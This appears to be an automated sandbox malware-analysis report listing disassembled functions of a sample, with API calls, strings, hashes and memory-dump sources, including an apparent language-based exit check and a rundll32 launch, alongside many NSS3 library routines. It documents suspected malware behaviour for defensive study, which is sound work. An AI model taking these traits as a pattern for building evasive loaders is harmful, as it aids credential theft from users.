API call with %s database connection pointer, xrefs: 6C6C4DBD
%s at line %d of [%.10s], xrefs: 6C6C4DDA
misuse, xrefs: 6C6C4DD5
9547e2c38a1c6f751a77d4d796894dec4dc5d8f5d79b1cd39e1ffc50df7b3be4, xrefs: 6C6C4DCB

Memory Dump Source

Source File: 00000000.00000002.1884024642.000000006C571000.00000020.00000001.01000000.00000007.sdmp, Offset: 6C570000, based on PE: true

Associated: 00000000.00000002.1884002609.000000006C570000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.1884228524.000000006C70F000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.1884318765.000000006C74E000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.1884378966.000000006C74F000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.1884411344.000000006C750000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.1884430350.000000006C755000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c570000_i3NmF0obCm.jbxd

Similarity

API ID: sqlite3_log
String ID: %s at line %d of [%.10s]$9547e2c38a1c6f751a77d4d796894dec4dc5d8f5d79b1cd39e1ffc50df7b3be4$API call with %s database connection pointer$invalid$misuse
API String ID: 632333372-2974027950
Opcode ID: 66d78a4350f53624b8eb8e2301a9295f6c8de264b621a9b1c823bc293f472521
Instruction ID: 9b9042803aa8b8929a671eeb8c1be1121f0124278c12fdc713cc628615ae6a9f
Opcode Fuzzy Hash: 66d78a4350f53624b8eb8e2301a9295f6c8de264b621a9b1c823bc293f472521
Instruction Fuzzy Hash: FBF0E921F185786BD700A155CE21FF637D9CF1132AF5609A0ED086BE92D64ABD9082DA

Function 6C6C4DF0 Relevance: 12.3, APIs: 2, Strings: 5, Instructions: 35COMMON

Download Yara Rule

APIs

sqlite3_log.NSS3(00000015,API call with %s database connection pointer,invalid), ref: 6C6C4E30
sqlite3_log.NSS3(00000015,%s at line %d of [%.10s],misuse,00029CAD,9547e2c38a1c6f751a77d4d796894dec4dc5d8f5d79b1cd39e1ffc50df7b3be4), ref: 6C6C4E4D

Strings

invalid, xrefs: 6C6C4E25
API call with %s database connection pointer, xrefs: 6C6C4E2A
%s at line %d of [%.10s], xrefs: 6C6C4E47
misuse, xrefs: 6C6C4E42
9547e2c38a1c6f751a77d4d796894dec4dc5d8f5d79b1cd39e1ffc50df7b3be4, xrefs: 6C6C4E38

Memory Dump Source

Source File: 00000000.00000002.1884024642.000000006C571000.00000020.00000001.01000000.00000007.sdmp, Offset: 6C570000, based on PE: true

Associated: 00000000.00000002.1884002609.000000006C570000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.1884228524.000000006C70F000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.1884318765.000000006C74E000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.1884378966.000000006C74F000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.1884411344.000000006C750000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.1884430350.000000006C755000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c570000_i3NmF0obCm.jbxd

Similarity

API ID: sqlite3_log
String ID: %s at line %d of [%.10s]$9547e2c38a1c6f751a77d4d796894dec4dc5d8f5d79b1cd39e1ffc50df7b3be4$API call with %s database connection pointer$invalid$misuse
API String ID: 632333372-2974027950
Opcode ID: 400159108b09bec6bf0843fcdc633228fa1e55e070997be7ebb12a7c0793eb52
Instruction ID: 389cb98c4e7db98e3dd955219cce54ab427e452b29d35f923ca4f5d9062043ab
Opcode Fuzzy Hash: 400159108b09bec6bf0843fcdc633228fa1e55e070997be7ebb12a7c0793eb52
Instruction Fuzzy Hash: 5EF09E10F8843C6BD71092618D10FF637C9CB05329F0A44A0EE0867EA3C249D96342D7

Function 00EF46A0 Relevance: 12.3, APIs: 6, Strings: 1, Instructions: 27COMMON

Download Yara Rule

APIs

GetUserDefaultLangID.KERNEL32(?,?,00EF4956,00EFE4C7), ref: 00EF46A4
ExitProcess.KERNEL32 ref: 00EF46D5
ExitProcess.KERNEL32 ref: 00EF46DF
ExitProcess.KERNEL32 ref: 00EF46E9
ExitProcess.KERNEL32 ref: 00EF46F3
ExitProcess.KERNEL32 ref: 00EF46FD

Strings

*, xrefs: 00EF46BC

Memory Dump Source

Source File: 00000000.00000002.1859121240.0000000000EE1000.00000080.00000001.01000000.00000003.sdmp, Offset: 00EE0000, based on PE: true

Associated: 00000000.00000002.1859096402.0000000000EE0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1859145624.0000000000EFC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1859163330.0000000000F04000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1859181498.0000000000F28000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1859181498.0000000000F86000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1859181498.000000000102A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1859181498.0000000001105000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1859377166.0000000001117000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_ee0000_i3NmF0obCm.jbxd

Yara matches

Similarity

API ID: ExitProcess$DefaultLangUser
String ID: *
API String ID: 1494266314-163128923
Opcode ID: 92df75900af612e847f6fd523c2f003a5697c51750c496f435bc0be1b0b038f0
Instruction ID: 4aa857722977c255e5f9b3bc5279de11bfdaf58cd94f6fb253cfa02350372fa4
Opcode Fuzzy Hash: 92df75900af612e847f6fd523c2f003a5697c51750c496f435bc0be1b0b038f0
Instruction Fuzzy Hash: F2F05470945208EFEB99AFE4E60D72CBB72EB09703F0001A9E6199A1C5C7B84E50DF52

Function 6C630C90 Relevance: 12.2, APIs: 8, Instructions: 191memorythreadCOMMON

Download Yara Rule

APIs

PR_SetError.NSS3(00000000,00000000,6C631444,?,00000001,?,00000000,00000000,?,?,6C631444,?,?,00000000,?,?), ref: 6C630CB3

Part of subcall function 6C69C2A0: TlsGetValue.KERNEL32(FFFFE89D,00000000,?,?,?,?,?,?,?,?,?,?,?,00000001,00000000,00000000), ref: 6C69C2BF

PR_SetError.NSS3(FFFFE089,00000000,?,?,?,?,6C631444,?,00000001,?,00000000,00000000,?,?,6C631444,?), ref: 6C630DC1
PORT_Strdup_Util.NSS3(?,?,?,?,?,?,6C631444,?,00000001,?,00000000,00000000,?,?,6C631444,?), ref: 6C630DEC

Part of subcall function 6C650F10: strlen.API-MS-WIN-CRT-STRING-L1-1-0(?,?,00000000,?,?,6C5F2AF5,?,?,?,?,?,6C5F0A1B,00000000), ref: 6C650F1A
Part of subcall function 6C650F10: malloc.MOZGLUE(00000001), ref: 6C650F30
Part of subcall function 6C650F10: memcpy.VCRUNTIME140(00000000,?,00000001), ref: 6C650F42

SECITEM_AllocItem_Util.NSS3(00000000,00000000,?,?,?,?,?,?,6C631444,?,00000001,?,00000000,00000000,?), ref: 6C630DFF
memcpy.VCRUNTIME140(?,?,?,?,?,?,?,?,?,?,?,6C631444,?,00000001,?,00000000), ref: 6C630E16
free.MOZGLUE(?,?,?,?,?,?,?,?,?,6C631444,?,00000001,?,00000000,00000000,?), ref: 6C630E53
PR_GetCurrentThread.NSS3(?,?,?,?,6C631444,?,00000001,?,00000000,00000000,?,?,6C631444,?,?,00000000), ref: 6C630E65
PR_SetError.NSS3(FFFFE089,00000000,?,?,?,?,6C631444,?,00000001,?,00000000,00000000,?), ref: 6C630E79

Part of subcall function 6C641560: TlsGetValue.KERNEL32(00000000,?,6C610844,?), ref: 6C64157A
Part of subcall function 6C641560: EnterCriticalSection.KERNEL32(?,?,?,6C610844,?), ref: 6C64158F
Part of subcall function 6C641560: PR_Unlock.NSS3(?,?,?,?,6C610844,?), ref: 6C6415B2

Part of subcall function 6C60B1A0: DeleteCriticalSection.KERNEL32(5B5F5EDC,6C611397,00000000,?,6C60CF93,5B5F5EC0,00000000,?,6C611397,?), ref: 6C60B1CB
Part of subcall function 6C60B1A0: free.MOZGLUE(5B5F5EC0,?,6C60CF93,5B5F5EC0,00000000,?,6C611397,?), ref: 6C60B1D2

Part of subcall function 6C6089E0: TlsGetValue.KERNEL32(00000000,-00000008,00000000,?,?,6C6088AE,-00000008), ref: 6C608A04
Part of subcall function 6C6089E0: EnterCriticalSection.KERNEL32(?), ref: 6C608A15
Part of subcall function 6C6089E0: memset.VCRUNTIME140(6C6088AE,00000000,00000132), ref: 6C608A27
Part of subcall function 6C6089E0: PR_Unlock.NSS3(?), ref: 6C608A35

Memory Dump Source

Source File: 00000000.00000002.1884024642.000000006C571000.00000020.00000001.01000000.00000007.sdmp, Offset: 6C570000, based on PE: true

Associated: 00000000.00000002.1884002609.000000006C570000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.1884228524.000000006C70F000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.1884318765.000000006C74E000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.1884378966.000000006C74F000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.1884411344.000000006C750000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.1884430350.000000006C755000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c570000_i3NmF0obCm.jbxd

Similarity

API ID: CriticalErrorSectionValue$EnterUnlockUtilfreememcpy$AllocCurrentDeleteItem_Strdup_Threadmallocmemsetstrlen
String ID:
API String ID: 1601681851-0
Opcode ID: 35be980df59e85ea8eb65f2fa41eba6c375137828b84ea8c6e22d7b3677bf0eb
Instruction ID: 2fb6051bb1829520fc1b80fbb7fdf3a35231f0ced71e4ef67562d4f099326512
Opcode Fuzzy Hash: 35be980df59e85ea8eb65f2fa41eba6c375137828b84ea8c6e22d7b3677bf0eb
Instruction Fuzzy Hash: 3E51D8B5E002105FEB019F68DC81AAB37E8AF4631CF141024ED0997B52FB31ED1987AE

Function 6C5E6E50 Relevance: 12.2, APIs: 8, Instructions: 189COMMON

Download Yara Rule

APIs

sqlite3_value_text.NSS3(?,?), ref: 6C5E6ED8
sqlite3_value_text.NSS3(?,?), ref: 6C5E6EE5
memcmp.VCRUNTIME140(00000000,?,?,?,?), ref: 6C5E6FA8
sqlite3_value_text.NSS3(00000000,?), ref: 6C5E6FDB
sqlite3_result_error_nomem.NSS3(?,?,?,?,?), ref: 6C5E6FF0
sqlite3_value_blob.NSS3(?,?), ref: 6C5E7010
sqlite3_value_blob.NSS3(?,?), ref: 6C5E701D
sqlite3_value_text.NSS3(00000000,?,?,?), ref: 6C5E7052

Memory Dump Source

Source File: 00000000.00000002.1884024642.000000006C571000.00000020.00000001.01000000.00000007.sdmp, Offset: 6C570000, based on PE: true

Associated: 00000000.00000002.1884002609.000000006C570000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.1884228524.000000006C70F000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.1884318765.000000006C74E000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.1884378966.000000006C74F000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.1884411344.000000006C750000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.1884430350.000000006C755000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c570000_i3NmF0obCm.jbxd

Similarity

API ID: sqlite3_value_text$sqlite3_value_blob$memcmpsqlite3_result_error_nomem
String ID:
API String ID: 1920323672-0
Opcode ID: 57d65fe103ef80eae202222d4fafda18670634c866d22cde1ad7ef744c37ff6b
Instruction ID: 9b31040ed842d61f16a55e482f696013f02e32216947de30956af334dd6867ef
Opcode Fuzzy Hash: 57d65fe103ef80eae202222d4fafda18670634c866d22cde1ad7ef744c37ff6b
Instruction Fuzzy Hash: 7361F4B1E1430A8FDB00CF68DC507EEB7B2AF89348F284168D524AB756EB319D15CB95

Function 6C658F80 Relevance: 12.2, APIs: 8, Instructions: 158memoryCOMMON

Download Yara Rule

APIs

SECOID_FindOID_Util.NSS3(?,?,FFFFE005,?,6C657313), ref: 6C658FBB

Part of subcall function 6C6507B0: PL_HashTableLookupConst.NSS3(?,FFFFFFFF,?,?,6C5F8298,?,?,?,6C5EFCE5,?), ref: 6C6507BF
Part of subcall function 6C6507B0: PL_HashTableLookup.NSS3(?,?), ref: 6C6507E6
Part of subcall function 6C6507B0: PR_SetError.NSS3(FFFFE08F,00000000), ref: 6C65081B
Part of subcall function 6C6507B0: PR_SetError.NSS3(FFFFE08F,00000000), ref: 6C650825

SECOID_FindOID_Util.NSS3(?,?,?,FFFFE005,?,6C657313), ref: 6C659012
SECOID_FindOID_Util.NSS3(?,?,?,?,FFFFE005,?,6C657313), ref: 6C65903C
SECITEM_CompareItem_Util.NSS3(?,?,?,?,?,?,FFFFE005,?,6C657313), ref: 6C65909E
PORT_ArenaGrow_Util.NSS3(?,?,?,00000001,?,?,?,?,?,?,FFFFE005,?,6C657313), ref: 6C6590DB
PORT_ArenaAlloc_Util.NSS3(?,00000008,?,?,?,?,?,?,FFFFE005,?,6C657313), ref: 6C6590F1

Part of subcall function 6C6510C0: TlsGetValue.KERNEL32(?,6C5F8802,00000000,00000008,?,6C5EEF74,00000000), ref: 6C6510F3
Part of subcall function 6C6510C0: EnterCriticalSection.KERNEL32(?,?,6C5F8802,00000000,00000008,?,6C5EEF74,00000000), ref: 6C65110C
Part of subcall function 6C6510C0: PL_ArenaAllocate.NSS3(?,?,?,6C5F8802,00000000,00000008,?,6C5EEF74,00000000), ref: 6C651141
Part of subcall function 6C6510C0: PR_Unlock.NSS3(?,?,?,6C5F8802,00000000,00000008,?,6C5EEF74,00000000), ref: 6C651182
Part of subcall function 6C6510C0: TlsGetValue.KERNEL32(?,6C5F8802,00000000,00000008,?,6C5EEF74,00000000), ref: 6C65119C

PR_SetError.NSS3(FFFFE005,00000000,?,?,?,FFFFE005,?,6C657313), ref: 6C65906B

Part of subcall function 6C69C2A0: TlsGetValue.KERNEL32(FFFFE89D,00000000,?,?,?,?,?,?,?,?,?,?,?,00000001,00000000,00000000), ref: 6C69C2BF

PR_SetError.NSS3(FFFFE005,00000000,?,FFFFE005,?,6C657313), ref: 6C659128

Memory Dump Source

Source File: 00000000.00000002.1884024642.000000006C571000.00000020.00000001.01000000.00000007.sdmp, Offset: 6C570000, based on PE: true

Associated: 00000000.00000002.1884002609.000000006C570000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.1884228524.000000006C70F000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.1884318765.000000006C74E000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.1884378966.000000006C74F000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.1884411344.000000006C750000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.1884430350.000000006C755000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c570000_i3NmF0obCm.jbxd

Similarity

API ID: Util$Error$ArenaFindValue$HashLookupTable$Alloc_AllocateCompareConstCriticalEnterGrow_Item_SectionUnlock
String ID:
API String ID: 3590961175-0
Opcode ID: 2fc2936615f096d3f3ee8ad3ca23cfff263c484281e358dca533e153235934d8
Instruction ID: 0e8f3597ea79df409d74a7b1342f6ab9890d2afeed04bc7826acc907f70df6db
Opcode Fuzzy Hash: 2fc2936615f096d3f3ee8ad3ca23cfff263c484281e358dca533e153235934d8
Instruction Fuzzy Hash: A751E5B1A002118FEB10DF6ADC44B26B3F5AF4531CFB54429D915D7B61EB32E822CB99

Function 6C642470 Relevance: 12.1, APIs: 8, Instructions: 141COMMON

Download Yara Rule

APIs

TlsGetValue.KERNEL32(6C642D7C,6C619192,?), ref: 6C64248E
EnterCriticalSection.KERNEL32(02B80138), ref: 6C6424A2
memset.VCRUNTIME140(6C642D7C,00000020,6C642D5C), ref: 6C64250E
memset.VCRUNTIME140(6C642D9C,00000020,6C642D7C), ref: 6C642535
memset.VCRUNTIME140(?,00000020,?), ref: 6C64255C
memset.VCRUNTIME140(?,00000020,?), ref: 6C642583
PR_Unlock.NSS3(?), ref: 6C642594
PR_SetError.NSS3(00000000,00000000), ref: 6C6425AF

Part of subcall function 6C69C2A0: TlsGetValue.KERNEL32(FFFFE89D,00000000,?,?,?,?,?,?,?,?,?,?,?,00000001,00000000,00000000), ref: 6C69C2BF

Memory Dump Source

Source File: 00000000.00000002.1884024642.000000006C571000.00000020.00000001.01000000.00000007.sdmp, Offset: 6C570000, based on PE: true

Associated: 00000000.00000002.1884002609.000000006C570000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.1884228524.000000006C70F000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.1884318765.000000006C74E000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.1884378966.000000006C74F000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.1884411344.000000006C750000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.1884430350.000000006C755000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c570000_i3NmF0obCm.jbxd

Similarity

API ID: memset$Value$CriticalEnterErrorSectionUnlock
String ID:
API String ID: 2972906980-0
Opcode ID: 7b8867289bcce85c01b63c8e90ab048b3dd4fbec799cdf0d12d21a6120ccbf0b
Instruction ID: 721cff40a059773718271e5d73652560f69eefe454e365766c190a320b91d865
Opcode Fuzzy Hash: 7b8867289bcce85c01b63c8e90ab048b3dd4fbec799cdf0d12d21a6120ccbf0b
Instruction Fuzzy Hash: E341F5B1E002059BEB089F34CC9C7AA3774FB99308F249A69DC05D7A51F770AA94C795

Function 6C700860 Relevance: 12.1, APIs: 8, Instructions: 61COMMON

Download Yara Rule

APIs

PR_LogFlush.NSS3(00000000,00000000,?,?,6C707AE2,?,?,?,?,?,?,6C70798A), ref: 6C70086C

Part of subcall function 6C700930: EnterCriticalSection.KERNEL32(?,00000000,?,6C700C83), ref: 6C70094F
Part of subcall function 6C700930: fwrite.API-MS-WIN-CRT-STDIO-L1-1-0(?,00000001,?,?,?,6C700C83), ref: 6C700974
Part of subcall function 6C700930: fflush.API-MS-WIN-CRT-STDIO-L1-1-0 ref: 6C700983
Part of subcall function 6C700930: _PR_MD_UNLOCK.NSS3(?,?,6C700C83), ref: 6C70099F

__acrt_iob_func.API-MS-WIN-CRT-STDIO-L1-1-0(00000001,00000000,00000000,?,?,6C707AE2,?,?,?,?,?,?,6C70798A), ref: 6C70087D
__acrt_iob_func.API-MS-WIN-CRT-STDIO-L1-1-0(00000002,6C707AE2,?,?,?,?,?,?,6C70798A), ref: 6C700892
fclose.API-MS-WIN-CRT-STDIO-L1-1-0(?,?,?,?,?,?,?,?,?,6C70798A), ref: 6C7008AA
free.MOZGLUE(?,00000000,00000000,?,?,6C707AE2,?,?,?,?,?,?,6C70798A), ref: 6C7008C7
free.MOZGLUE(?,00000000,00000000,?,?,6C707AE2,?,?,?,?,?,?,6C70798A), ref: 6C7008E9
free.MOZGLUE(?,6C707AE2,?,?,?,?,?,?,6C70798A), ref: 6C7008EF
PR_DestroyLock.NSS3(?,00000000,00000000,?,?,6C707AE2,?,?,?,?,?,?,6C70798A), ref: 6C70090E

Memory Dump Source

Source File: 00000000.00000002.1884024642.000000006C571000.00000020.00000001.01000000.00000007.sdmp, Offset: 6C570000, based on PE: true

Associated: 00000000.00000002.1884002609.000000006C570000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.1884228524.000000006C70F000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.1884318765.000000006C74E000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.1884378966.000000006C74F000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.1884411344.000000006C750000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.1884430350.000000006C755000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c570000_i3NmF0obCm.jbxd

Similarity

API ID: free$__acrt_iob_func$CriticalDestroyEnterFlushLockSectionfclosefflushfwrite
String ID:
API String ID: 3145526462-0
Opcode ID: 81eaeab0a15ae9e5f88589589f0380f2363a0d1b1343f5d5207c5559388fddbb
Instruction ID: c031a73b4cd16cb7b200bd45812b9c27ff8c9c40f44d03f9f13969b31b22c562
Opcode Fuzzy Hash: 81eaeab0a15ae9e5f88589589f0380f2363a0d1b1343f5d5207c5559388fddbb
Instruction Fuzzy Hash: 7B1160F1B022444BEF00AF59DA5574A37B8FB4226EF690135E416976C0DF32E9148BD2

Function 00EF1F80 Relevance: 10.8, APIs: 1, Strings: 5, Instructions: 251COMMON

Download Yara Rule

APIs

Part of subcall function 00EF8560: lstrcpy.KERNEL32(00EFE4C7,00000000), ref: 00EF85A8

Part of subcall function 00EF6CF0: SHGetFolderPathA.SHELL32(00000000,?,00000000,00000000,?,?,000003E8), ref: 00EF6D1B

Part of subcall function 00EF8740: lstrcpy.KERNEL32(00000000,?), ref: 00EF8792
Part of subcall function 00EF8740: lstrcat.KERNEL32(00000000), ref: 00EF87A2

Part of subcall function 00EF86C0: lstrcpy.KERNEL32(?,00EFE4C7), ref: 00EF8725

Part of subcall function 00EF87D0: lstrlen.KERNEL32(?,00EFE98C,?,00000000,00EFE4C7), ref: 00EF87E5
Part of subcall function 00EF87D0: lstrcpy.KERNEL32(00000000), ref: 00EF8824
Part of subcall function 00EF87D0: lstrcat.KERNEL32(00000000,00000000), ref: 00EF8832

Part of subcall function 00EF6A70: GetSystemTime.KERNEL32(?,01324BF8,00EFE129,?,?,?,?,?,?,?,?,?,00EE4643,?,00000014), ref: 00EF6A96

ShellExecuteEx.SHELL32(0000003C), ref: 00EF22E7

Strings

"" , xrefs: 00EF21BC
C:\Windows\system32\rundll32.dll, xrefs: 00EF209F
.dll, xrefs: 00EF2034
<, xrefs: 00EF228C
2$, xrefs: 00EF226E, 00EF2312, 00EF2271

Memory Dump Source

Source File: 00000000.00000002.1859121240.0000000000EE1000.00000080.00000001.01000000.00000003.sdmp, Offset: 00EE0000, based on PE: true

Associated: 00000000.00000002.1859096402.0000000000EE0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1859145624.0000000000EFC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1859163330.0000000000F04000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1859181498.0000000000F28000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1859181498.0000000000F86000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1859181498.000000000102A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1859181498.0000000001105000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1859377166.0000000001117000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_ee0000_i3NmF0obCm.jbxd

Yara matches

Similarity

API ID: lstrcpy$lstrcat$ExecuteFolderPathShellSystemTimelstrlen
String ID: "" $.dll$2$$<$C:\Windows\system32\rundll32.dll
API String ID: 672783590-504567443
Opcode ID: 7e692784373c4375b68eb7740e6cd5a7da17fcbdc5d6848389b758d5749955ad
Instruction ID: 726b60a3ad9e078c129a6f68cf5cfb85f3de073f4f7446efa63206c0894337b4
Opcode Fuzzy Hash: 7e692784373c4375b68eb7740e6cd5a7da17fcbdc5d6848389b758d5749955ad
Instruction Fuzzy Hash: 9AA19D7281010C9ADF19FFA0CD92FFEB7B8AF14300F546199E206B6591EF742A49CB65

Function 6C574F60 Relevance: 10.7, APIs: 2, Strings: 4, Instructions: 211stringCOMMON

Download Yara Rule

APIs

strlen.API-MS-WIN-CRT-STRING-L1-1-0(?), ref: 6C574FC4
sqlite3_log.NSS3(00000015,%s at line %d of [%.10s],misuse,0002996C,9547e2c38a1c6f751a77d4d796894dec4dc5d8f5d79b1cd39e1ffc50df7b3be4), ref: 6C5751BB

Strings

unable to delete/modify user-function due to active statements, xrefs: 6C5751DF
%s at line %d of [%.10s], xrefs: 6C5751B4
misuse, xrefs: 6C5751AF
9547e2c38a1c6f751a77d4d796894dec4dc5d8f5d79b1cd39e1ffc50df7b3be4, xrefs: 6C5751A5

Memory Dump Source

Source File: 00000000.00000002.1884024642.000000006C571000.00000020.00000001.01000000.00000007.sdmp, Offset: 6C570000, based on PE: true

Associated: 00000000.00000002.1884002609.000000006C570000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.1884228524.000000006C70F000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.1884318765.000000006C74E000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.1884378966.000000006C74F000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.1884411344.000000006C750000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.1884430350.000000006C755000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c570000_i3NmF0obCm.jbxd

Similarity

API ID: sqlite3_logstrlen
String ID: %s at line %d of [%.10s]$9547e2c38a1c6f751a77d4d796894dec4dc5d8f5d79b1cd39e1ffc50df7b3be4$misuse$unable to delete/modify user-function due to active statements
API String ID: 3619038524-4115156624
Opcode ID: 690a6c3012c2094282e9f8e680748af866e60446e19569a4a60ff324677f07e7
Instruction ID: 5602569010b6757fbf3b739a1fd1057c2d90170e97338a86467212e5f76e8989
Opcode Fuzzy Hash: 690a6c3012c2094282e9f8e680748af866e60446e19569a4a60ff324677f07e7
Instruction Fuzzy Hash: 8771ACB1A0420ADFEB10CE25CD84F9A77B9BF48308F944524FD199BB81D735E990CBA1

Function 6C63AC10 Relevance: 10.6, APIs: 7, Instructions: 121memoryCOMMON

Download Yara Rule

APIs

PK11_CreateContextBySymKey.NSS3(00000133,00000105,00000000,?,?,6C63AB3E,?,?,?), ref: 6C63AC35

Part of subcall function 6C61CEC0: PK11_FreeSymKey.NSS3(00000000), ref: 6C61CF16

PORT_ArenaAlloc_Util.NSS3(?,?,?,?,?,?,?,6C63AB3E,?,?,?), ref: 6C63AC55

Part of subcall function 6C6510C0: TlsGetValue.KERNEL32(?,6C5F8802,00000000,00000008,?,6C5EEF74,00000000), ref: 6C6510F3
Part of subcall function 6C6510C0: EnterCriticalSection.KERNEL32(?,?,6C5F8802,00000000,00000008,?,6C5EEF74,00000000), ref: 6C65110C
Part of subcall function 6C6510C0: PL_ArenaAllocate.NSS3(?,?,?,6C5F8802,00000000,00000008,?,6C5EEF74,00000000), ref: 6C651141
Part of subcall function 6C6510C0: PR_Unlock.NSS3(?,?,?,6C5F8802,00000000,00000008,?,6C5EEF74,00000000), ref: 6C651182
Part of subcall function 6C6510C0: TlsGetValue.KERNEL32(?,6C5F8802,00000000,00000008,?,6C5EEF74,00000000), ref: 6C65119C

PK11_CipherOp.NSS3(?,00000000,?,?,?,?,?,?,?,?,?,?,?,6C63AB3E,?,?), ref: 6C63AC70

Part of subcall function 6C61E300: TlsGetValue.KERNEL32 ref: 6C61E33C
Part of subcall function 6C61E300: EnterCriticalSection.KERNEL32(?), ref: 6C61E350
Part of subcall function 6C61E300: PR_Unlock.NSS3(?), ref: 6C61E5BC
Part of subcall function 6C61E300: PK11_GenerateRandom.NSS3(00000000,00000008), ref: 6C61E5CA
Part of subcall function 6C61E300: TlsGetValue.KERNEL32 ref: 6C61E5F2
Part of subcall function 6C61E300: EnterCriticalSection.KERNEL32(?), ref: 6C61E606
Part of subcall function 6C61E300: PORT_Alloc_Util.NSS3(?), ref: 6C61E613

PK11_GetBlockSize.NSS3(00000133,00000000), ref: 6C63AC92
PK11_DestroyContext.NSS3(?,00000001,?,?,?,?,?,?,?,?,?,?,?,?,?,6C63AB3E), ref: 6C63ACD7
PORT_Alloc_Util.NSS3(?), ref: 6C63AD10
memcpy.VCRUNTIME140(00000000,?,FF850674), ref: 6C63AD2B

Part of subcall function 6C61F360: TlsGetValue.KERNEL32(00000000,?,6C63A904,?), ref: 6C61F38B
Part of subcall function 6C61F360: EnterCriticalSection.KERNEL32(?,?,?,6C63A904,?), ref: 6C61F3A0
Part of subcall function 6C61F360: PR_Unlock.NSS3(?,?,?,?,6C63A904,?), ref: 6C61F3D3

Memory Dump Source

Source File: 00000000.00000002.1884024642.000000006C571000.00000020.00000001.01000000.00000007.sdmp, Offset: 6C570000, based on PE: true

Associated: 00000000.00000002.1884002609.000000006C570000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.1884228524.000000006C70F000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.1884318765.000000006C74E000.00000004.00000001.01000000.00000007.sdmpDownload File
